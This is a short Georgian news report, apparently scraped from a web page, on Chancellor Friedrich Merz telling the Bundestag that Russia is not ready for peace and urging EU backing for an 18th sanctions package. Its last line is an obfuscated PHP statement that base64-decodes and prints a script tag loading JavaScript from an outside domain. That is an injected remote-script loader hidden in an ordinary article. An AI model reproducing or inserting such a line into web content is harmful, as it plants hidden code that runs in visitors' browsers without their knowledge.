gorgia
გარე ავეჯი

 რუსეთი ნამდვილი მშვიდობის მიღწევით დაინტერესებული არ არის, - ამის შესახებ გერმანიის კანცლერმა, ფრიდრიხ მერცმა ბუნდესტაგში სიტყვით გამოსვლისას განაცხადა.

„ნამდვილი და ხანგრძლივი მშვიდობა ყველა მხარის მხრიდან მზადყოფნას მოითხოვს და რუსეთიდან მომავალი სიგნალები აჩვენებს, რომ ამჟამად ის მშვიდობისთვის მზად არ არის, პირიქით“, - განაცხადა ფრიდრიხ მერცმა.

გერმანიის კანცლერმა ევროკავშირის სახელმწიფოებს მოუწოდა, რომ რუსეთის წინააღმდეგ სანქციების მე-18 პაკეტს მხარი დაუჭირონ.

„სანქციებმა პუტინის ომის მანქანის დასაფინანსებლად გამოყენებულ ჩრდილოვან ფლოტს მნიშვნელოვანი დარტყმა უნდა მიაყენოს. კვლავ დარწმუნებული ვარ, რომ ამერიკის მთავრობაც ამ გზას აირჩევს“, - აღნიშნა გერმანიის კანცლერმა.

160
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");